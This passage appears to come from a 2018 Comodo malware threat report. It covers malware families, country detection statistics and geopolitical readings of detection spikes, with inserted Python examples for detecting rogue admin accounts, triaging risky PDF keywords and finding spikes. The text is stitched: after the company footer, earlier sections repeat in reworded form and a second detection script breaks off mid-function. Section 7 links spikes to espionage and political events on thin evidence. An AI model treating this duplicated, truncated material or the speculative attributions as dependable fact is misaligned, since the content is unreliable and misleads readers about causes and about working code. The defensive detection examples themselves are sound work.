This timeline shows that while Comodo did not detect many IM Worms, they appeared throughout Q2 2018 in various corners of the globe, mostly in developing countries.


5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these types can be considered a more localized threat, as they typically depend on some user interaction or on an attacker-supplied delivery vector to reach and install on a host. Once installed on a system or network, however, they can be devastating to personal or enterprise security.


5.2.1 Backdoors

A backdoor is a hidden way to bypass normal authentication, usually used to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be a separately installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected in Q2 2018 was DarkComet (also written Dark Comet), a remote access trojan (RAT) that is now fully 10 years old. It lets an attacker control a compromised system from a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo's Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.


5.2.2 Viruses

A computer virus is self-replicating code that "infects" other programs and devices by modifying them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot reach another computer unless a user moves the infected file or takes some action, such as opening an attachment or clicking a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft rates Ramnit as a "severe" threat: it infects Windows executable files (.exe) and HTML files and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for Viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.


5.2.3 Trojans

Trojans take their name from the wooden horse of Greek mythology because their malicious functionality is hidden inside seemingly useful or benign programs. Typically, a Trojan gives a remote attacker the same rights and privileges as the local user who ran it, and Trojans are used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common Trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on the victim system and adds it to the Administrators group as a "Remote Service Account". A newly created local account that lands in Administrators within seconds of its creation is therefore a useful detection signal for this family.

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
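As an added example (not code from the report or from Comodo), the Python script below shows one way to detect the behavior attributed to Starter above: a local account that is created and then added to an administrators group within a short window. Event IDs 4720 (user account created) and 4732 (member added to a security-enabled local group) are the Windows Security log events for those actions. The pipe-delimited record format and the sample records are constructed for this example and are not real log output; real 4732 events identify the member by SID, which production code would have to resolve before matching names.

```python
from datetime import datetime, timedelta

# Constructed sample records in a simplified "timestamp|event_id|key=value|..." form.
# Real Windows Security log entries (4720 = user account created, 4732 = member
# added to a security-enabled local group) carry the same field names but are
# XML; 4732 also reports the member as a SID, which production code must resolve.
SAMPLE_EVENTS = """\
2018-06-03T10:15:02Z|4720|SubjectUserName=alice|TargetUserName=build_svc
2018-06-03T10:15:05Z|4732|SubjectUserName=alice|MemberName=build_svc|TargetUserName=Users
2018-06-03T10:20:41Z|4720|SubjectUserName=WIN7-PC$|TargetUserName=Remote Service Account
2018-06-03T10:20:42Z|4732|SubjectUserName=WIN7-PC$|MemberName=Remote Service Account|TargetUserName=Administrators
2018-06-04T09:00:00Z|4732|SubjectUserName=alice|MemberName=alice|TargetUserName=Administrators
"""

ADMIN_GROUPS = {"Administrators"}  # localized names (e.g. "Administratoren") would be added here


def parse_events(text: str) -> list:
    """Parse the simplified records into dicts with a datetime 'time' and an int 'id'."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, *kvs = line.split("|")
        fields = dict(kv.split("=", 1) for kv in kvs)
        fields["time"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        fields["id"] = int(eid)
        events.append(fields)
    return events


def find_rogue_admin_accounts(events: list, window: timedelta = timedelta(minutes=10)) -> list:
    """Flag accounts that were created (4720) and then added to an admin group
    (4732) within `window`. Pre-existing accounts promoted to admin and new
    accounts added to non-admin groups are not flagged, to keep the signal tight."""
    created = {}  # account name -> (creation time, creating principal)
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] == 4720:
            created[ev["TargetUserName"]] = (ev["time"], ev["SubjectUserName"])
        elif ev["id"] == 4732 and ev["TargetUserName"] in ADMIN_GROUPS:
            member = ev.get("MemberName", "")
            if member in created:
                t0, creator = created[member]
                if ev["time"] - t0 <= window:
                    alerts.append({
                        "account": member,
                        "group": ev["TargetUserName"],
                        "created_by": creator,
                        "seconds_between": (ev["time"] - t0).total_seconds(),
                        # A machine account ($) or SYSTEM as the actor means no
                        # interactive administrator did this, which is more suspicious.
                        "non_interactive_actor": creator.endswith("$") or creator.upper() == "SYSTEM",
                    })
    return alerts


if __name__ == "__main__":
    for alert in find_rogue_admin_accounts(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

Run against the sample, only the "Remote Service Account" creation is flagged: build_svc went into Users, and alice was promoted without a preceding creation event (a pre-existing account being promoted deserves its own review rule, but it is not the Starter pattern).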


5.2.4 Exploits

Exploits are pieces of software, chunks of data or sequences of commands that take advantage of existing bugs or vulnerabilities in software to circumvent access controls and potentially damage the target's software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

Exploit detections are comparatively rare, because the vulnerabilities they target are typically patched soon after they are discovered, which shrinks the window in which a given exploit is useful.

In Q2 2018, the majority of exploits detected by Comodo targeted a favorite attacker vehicle: Adobe Portable Document Format (PDF) files, a format created in the 1990s to present documents independently of application software, hardware and operating systems. These detections are malicious PDF documents crafted to trigger vulnerabilities in, or abuse active features (such as embedded JavaScript) of, the reader that opens them; the format itself is only the carrier, which is why suspicious PDFs are worth triaging before they are opened.
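Added example, not from the report: a minimal Python triage script for the PDF case. It counts the name tokens that let a document execute something when opened (/OpenAction, /AA, /JavaScript, /JS, /Launch and friends) and normalizes the #xx hex escapes attackers use to hide those keywords from naive string matching. The two sample documents are constructed for the example and contain no exploit, and the auto_exec rule is an illustrative heuristic, not Comodo's detection logic.

```python
import re

# Name tokens that turn a document into an execution vehicle; counts of these are
# the first triage signal before a suspicious PDF is opened.
RISKY_NAMES = ("/OpenAction", "/AA", "/JavaScript", "/JS", "/Launch",
               "/EmbeddedFile", "/RichMedia", "/XFA", "/ObjStm")

# A PDF name token: '/' followed by regular characters or #xx hex escapes.
_NAME_RE = re.compile(rb"/(?:[A-Za-z0-9_.\-]|#[0-9A-Fa-f]{2})+")
_HEX_RE = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalize_name(raw: bytes) -> str:
    """Decode #xx escapes so that /Java#53cript compares equal to /JavaScript."""
    return _HEX_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw).decode("latin-1")


def triage_pdf(data: bytes) -> dict:
    """Count risky name tokens in a PDF byte string.
    auto_exec is True when an automatic trigger (/OpenAction or /AA) is present
    together with something worth triggering (/JavaScript, /JS or /Launch)."""
    if not data.lstrip().startswith(b"%PDF-"):
        raise ValueError("missing %PDF- header")
    counts = {name: 0 for name in RISKY_NAMES}
    obfuscated = 0
    for m in _NAME_RE.finditer(data):
        name = normalize_name(m.group(0))
        if name in counts:
            counts[name] += 1
            if b"#" in m.group(0):
                obfuscated += 1  # hex-escaped keyword: legitimate generators do not do this
    trigger = counts["/OpenAction"] + counts["/AA"]
    payload = counts["/JavaScript"] + counts["/JS"] + counts["/Launch"]
    return {
        "counts": counts,
        "obfuscated_names": obfuscated,
        "auto_exec": trigger > 0 and payload > 0,
        # Keywords inside compressed object streams are invisible to a raw scan,
        # so /ObjStm by itself means "decompress before trusting a clean result".
        "needs_decompression": counts["/ObjStm"] > 0,
    }


# Constructed sample documents (not real malware): one that runs a script when
# opened, with the keyword hex-escaped, and one plain page.
SUSPICIOUS_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /S /Java#53cript /JS (app.alert(1)) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for label, doc in (("suspicious", SUSPICIOUS_PDF), ("benign", BENIGN_PDF)):
        print(label, triage_pdf(doc))
```

A raw byte scan like this is a first filter, not a verdict: a clean result on a file that contains /ObjStm or FlateDecode streams means nothing until those streams are inflated, and a file that fails the header check has already been tampered with.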

Japan and India were the two countries where Comodo detected the majority of Exploit activity in Q2 2018, with Japan clearly experiencing the most persistent challenges.


5.3 Medium Threat Malware

In this section we focus on five malware types that are somewhat rarer and more exotic: Constructors, Packers, Email Flooders, Virtual Tools and Jokes.


5.3.1 Constructor

Constructors are applications used to generate malware files automatically, letting an operator turn out many variants without writing code.

In Q2, Alamar was the #1 Constructor that Comodo detected. Microsoft classifies this program as a "Severe" threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that this malware is likely a persistent threat to German networks.


5.3.2 Packers

"Packed" malware refers to any means of hiding or obfuscating malicious executable code by compressing or "packing" it inside a larger, seemingly innocuous executable or data stream; the hostile code can even be a script. The packed payload is accompanied by a small decompression stub, or is wrapped as a self-extracting archive, which recreates the original code in memory at run time and then executes it. Encryption may also be layered on to conceal the malware from security software. Because the original code exists only in memory after unpacking, static signatures written for the unpacked binary do not match the packed file on disk.

MUPX, or "Modified Ultimate Packer for Executables", dominated this part of the malware landscape. UPX itself is free, open-source software that supports numerous executable formats and operating systems and uses the open-source UCL compression algorithm, whose decompressor is only a few hundred bytes of code. Modified builds typically rename or strip the telltale UPX section names and markers, so that the stock upx tool can no longer unpack the file and simple signature checks miss it, even though the packed sections still look like compressed data.

In Q2 2018, Russia was the #1 home of malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.


5.3.3 Email Flooder

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that modify or alter malicious files so that they evade detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

"Joke" malware is just what it says: non-malicious applications that claim to take a malicious action when in fact they are intended only as humor, or simply to annoy the user for a brief period.

Such programs are typically labeled only a "Medium" threat because the author's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but it is still something to be aware of.


5.4 Low Threat Malware (Applications)

In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. Comodo nonetheless detects and flags them as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Although Microsoft labels Elex only a "Potentially Unwanted Application" (PUA), this software is nasty: it attempts to install files that run at startup, add drivers, inject into processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that far from being a rare occurrence, such software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application category is alarming in that users often install these programs inadvertently in the course of ordinary computer and Internet activity. Examples include common adware programs, widely disseminated images and videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Programs of this kind include free toolbars, adware and "system optimizers".

As the bubble chart shows, the US was far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but do the opposite; examples include fake anti-virus products and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed together with additional malware that users install inadvertently.

This malware type is a bit different in that while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical analysis

In this section we examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two Trojans, Kryptik and Zbot, that were the top detection not in one but in multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now also targets email clients, file browsers and file managers. CNET wrote that Kryptik has been used as a Trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017. Note that "Kryptik" is a generic detection name given to heavily obfuscated or packed Trojans rather than to a single family, which partly explains why it surfaces at the top of so many verticals.

Second, let's examine "Zbot", another name for the "Zeus" Trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Its source code leaked in 2011 and spawned numerous derivatives, and today Zeus-derived botnets may be among the largest on the Internet, with millions of compromised machines around the world.

Zeus has most often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing (capturing data from web forms inside the browser, before it is encrypted for transmission). It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing, sometimes supported by a social engineering scheme that falsely claims the target's computer already has a Virus and needs to be cleaned.

In conclusion, Trojans are dangerous malware found in every vertical and used for a wide variety of cyberattacks. Strategic analysis like this can be used to create a unique malware profile for each vertical and provides valuable cyber intelligence that clarifies the primary malware threats and focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018 (note that it extends before the start of Q2). The major spike on March 13 clearly stands out. What happened in the US on that day that might help explain the surge in malware activity? On that day US President Donald Trump announced his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for the dramatic rise in detections is that intelligence agencies around the world suddenly received a raft of new collection requirements, comprising many requests for information about upcoming changes in US political, military and intelligence activities, and immediately set about fulfilling them by computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes. A detection spike establishes a coincidence in time; attributing it to a particular actor or motive is an analytical judgement.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. June 4 clearly stands out as the single most prominent day. The likely reason for this massive spike is that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? It is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that forms the basis of intelligence reporting. This graph shows Comodo Trojan detections in South Korea during Q2 2018. The highest spikes coincided with the annual joint US-South Korean military exercises. This should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation is that someone, or some institution, was briefly more connected to the Internet than usual, or was trying to take advantage of a short period of political openness to connect with the outside world. Comodo researched the detected files and identified them as Windows activation ("cracking") software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that nearly all activities, from social life to business, politics and national security affairs, are now conducted online. This is especially true in times of national crisis, when both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution (the April-May "Velvet Revolution") was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news", Comodo detected a massive spike in both Viruses and Trojans. It is possible that the Virus outbreak was used specifically to disseminate Trojans, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart of Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out, and both might be associated with recent electoral events. In mid-April, Iraq was preparing for its May 12 national election, which included the conundrum of how best to secure its electronic dimension. And at the beginning of July (just after the close of Q2), Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been several reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government, and the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city Kyiv on May 26.


7.9 Croatia

Since the 2007 cyberattacks on Estonia, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context, the massive spike in malware detections in Croatia on March 28 (again before the start of Q2) is interesting: it came a mere day after the Russian government called the Croatian government's decision to expel a Russian diplomat, in solidarity with London over the March 2018 poisoning of a former Russian spy in England, an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's look at Comodo's Virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this Virus activity revealed that it took place almost exclusively in Vantaa, the Helsinki suburb that hosts the city's international airport.
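The spikes this section relies on can be identified objectively rather than by eye. As an added example (not the report's method and not Comodo's data), the Python below flags days whose count is a robust outlier against the quarter's median and then lists calendar entries that fall within a day of each spike. The daily series and the calendar are constructed for the example; the June 4 anniversary is the event the China section discusses, and the 5.0 threshold is an assumption. A calendar match shows coincidence in time only; it does not identify who generated the traffic or why.

```python
from datetime import date, timedelta
import statistics


def robust_spikes(counts, threshold=5.0):
    """Indices whose count is a robust outlier: (x - median) / MAD > threshold.
    Median and MAD (median absolute deviation, scaled by 1.4826 so it estimates
    sigma on normal data) are used instead of mean/stddev so that the spike
    itself does not inflate the baseline it is compared against."""
    med = statistics.median(counts)
    mad = statistics.median([abs(x - med) for x in counts]) * 1.4826
    if mad == 0:                   # perfectly flat baseline: any deviation counts
        mad = max(1.0, 0.1 * med)
    return [i for i, x in enumerate(counts) if (x - med) / mad > threshold]


def spike_dates(start, counts, threshold=5.0):
    """Map spike indices of a daily series beginning at `start` to calendar dates."""
    return [start + timedelta(days=i) for i in robust_spikes(counts, threshold)]


def match_events(dates, calendar, slack_days=1):
    """For each spike date, list calendar entries within +/- slack_days.
    A match is a coincidence in time, not evidence that the event caused the spike."""
    out = {}
    for d in dates:
        out[d] = [desc for when, desc in calendar.items()
                  if abs((when - d).days) <= slack_days]
    return out


Q2_START = date(2018, 4, 1)


def constructed_series():
    """Daily detection counts for 1 April to 30 June 2018 (91 days), constructed:
    a baseline varying between 100 and 110, a modest bump on 11 May and a large
    spike on 4 June. Not Comodo's data."""
    counts = [100 + (i * 7) % 11 for i in range(91)]
    counts[(date(2018, 5, 11) - Q2_START).days] = 125
    counts[(date(2018, 6, 4) - Q2_START).days] = 900
    return counts


# Constructed calendar holding the event the report's China section discusses.
CALENDAR = {date(2018, 6, 4): "anniversary of the 1989 Tiananmen Square protests"}


if __name__ == "__main__":
    spikes = spike_dates(Q2_START, constructed_series())
    for d, why in match_events(spikes, CALENDAR).items():
        print(d, why or "no matching calendar entry")
```

With the default threshold only June 4 is reported; lowering it to 3.0 also surfaces the May 11 bump, which is the usual trade-off between missing modest events and chasing noise.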


8 Conclusions

In Q2, Comodo Cybersecurity observed several significant new trends that are likely to influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The increase in Trojan malware last quarter means that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the cybersecurity industry should assume that many Trojan-based attacks that occurred in Q2 remain undetected, with their real impact revealed in quarters to come. Another meaningful fact is that Trojans serve as a delivery vector for other types of malware. Combined, these facts point to a large surge in infections of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools such as PowerShell to attack are clear evidence of this rise in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that of desktop systems, which presages new attacks and further mobile malware development. As more people use mobile devices for financial transactions (via banking and e-payment apps) and to store confidential information (such as messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of Trojans detected in Q2 were information stealers, another dangerous tendency is visible: cybercriminals are increasingly biased toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably to revamp their security strategy, policies and postures.

REQUEST A DEMO

Try Comodo Cybersecurity by speaking with a security consultant to begin the process of setting up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 All rights reserved. Comodo Security Solutions, Inc. Visit comodo.com.

NORTH AMERICA
Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States
Tel: +1 (888) 551 1531; Tel: +1 (888) 266 6361; Int: +1 (703) 581 6361; Fax: +1 (973) 777 4394; sales@comodo.com

EUROPE
Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania
Tel: +40 332 806 772

ASIA
Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India
Tel: +91 44 4562 2800; www.comodo.co.in

About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown", potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group, Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


Global Threat Report Q2 2018 Edition

Page 44 of 73

5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or “peers”) that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files, such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a “memory resident” virus that infects “.exe” and “.scr” files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.


5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an “IM” or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.


5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom (“gb” for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK’s Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.


5.2.2 Viruses

A computer virus is self-replicating code that “infects” other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a “severe” virus that infects Windows executable files (.exe) and HTML files (.html) and spreads through infected removable drives, such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.


5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a “Remote Service Account”.

The bubble chart shows that Germany (de) was the #1 country for Trojans, according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
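The Starter behaviour described above (a new local account that is immediately added to the administrators group) is a pairing that can be caught in the Windows Security log. The following detection is an added example written for this page, not Comodo's or Microsoft's code; the log lines are constructed samples in a simplified text form, and the 15-minute correlation window and the `subject=`/`target=`/`group=` field names are assumptions. The event IDs are the real Windows ones (4720 = user account created, 4732 = member added to a security-enabled local group).

```python
"""Correlate 'account created' (4720) with 'account added to an
administrative group' (4732), the pairing described for the Starter trojan.

Added example written for this page; not Comodo's or Microsoft's code.
The log lines below are constructed samples, not real telemetry."""
import re
from datetime import datetime, timedelta

# Constructed sample log (assumed format: timestamp, event id, key=value fields)
SAMPLE_LOG = """\
2018-06-03T02:14:07 4720 subject=CONTOSO\\svc-backup target=RemoteSvc group=
2018-06-03T02:14:09 4732 subject=CONTOSO\\svc-backup target=RemoteSvc group=Administrators
2018-06-03T09:30:00 4720 subject=CONTOSO\\helpdesk target=jdoe group=
2018-06-03T09:31:12 4732 subject=CONTOSO\\helpdesk target=jdoe group=Remote Desktop Users
2018-06-04T10:00:00 4732 subject=CONTOSO\\itadmin target=alice group=Administrators
2018-06-05T08:00:00 4720 subject=CONTOSO\\helpdesk target=bob group=
2018-06-06T08:00:00 4732 subject=CONTOSO\\helpdesk target=bob group=Administrators
"""

LINE_RE = re.compile(r"^(\S+) (\d+) subject=(.*?) target=(.*?) group=(.*)$")


def parse_events(text):
    """Parse the constructed log format into dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, eid, subject, target, group = m.groups()
        events.append({
            "ts": datetime.fromisoformat(ts),
            "event_id": int(eid),
            "subject": subject,   # account that performed the action
            "target": target,     # account that was created / added
            "group": group,       # group name (4732 only)
        })
    return events


def find_created_then_admin(events, window=timedelta(minutes=15),
                            admin_groups=("Administrators",)):
    """Return one alert per account that was created and then, within
    `window`, added to an administrative group.

    An account created without an admin add, and an admin add of a
    long-standing account, produce no alert on their own: the signal is the
    pairing and its timing, which separates Starter-style behaviour from
    routine administration."""
    created = {}   # lower-cased account name -> its 4720 event
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        name = ev["target"].lower()
        if ev["event_id"] == 4720:
            created[name] = ev
        elif ev["event_id"] == 4732 and ev["group"] in admin_groups:
            c = created.get(name)
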